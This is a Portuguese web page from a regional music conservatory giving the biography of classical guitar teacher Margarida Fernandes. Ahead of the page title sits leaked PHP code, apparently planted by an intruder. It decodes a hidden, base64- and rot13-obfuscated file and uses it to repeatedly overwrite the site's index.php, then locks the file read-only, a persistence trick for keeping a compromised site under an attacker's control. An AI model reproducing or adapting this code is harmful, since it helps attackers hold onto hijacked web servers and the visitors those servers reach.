$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Margarida Fernandes – Guitarra – Conservatório Regional do Baixo Alentejo

Margarida Fernandes – Guitarra

Nasceu em 1990 e é natural de Tomar. Iniciou o seu percurso na via musical aos 8 anos. Completou o 8ºgrau de flauta transversal e de guitarra clássica. Em 2012, conclui a licenciatura de música na Universidade de Évora, na variante de guitarra clássica na classe do professor Dejan Ivanovic e em 2017 o Mestrado em Ensino de Música no ISEIT de Almada.

Ao longo da sua formação académica participou em concursos, formações e masterclasses com os mais diversos guitarristas, destacando Marco Socias, Carlo Marchione, Michalis Kontaxakis, Roberto Aussel e Roland Dyens.

Desde de 2010 que participa nas sessões de música para bebés integradas no Festival dos Bons Sons. Entre 2011 e 2013 foi diretora artística da Tuna Académica Feminina da Universidade de Évora.  Em 2016 tocou guitarra portuguesa no projeto de fado “Belisa”.

Como docente, desempenha a função desde 2007 e lecionou em vários conservatórios de música. Atualmente, exerce aulas de guitarra clássica e de classe de conjunto no Conservatório Regional do Baixo Alentejo.

Leave a Reply

Your email address will not be published.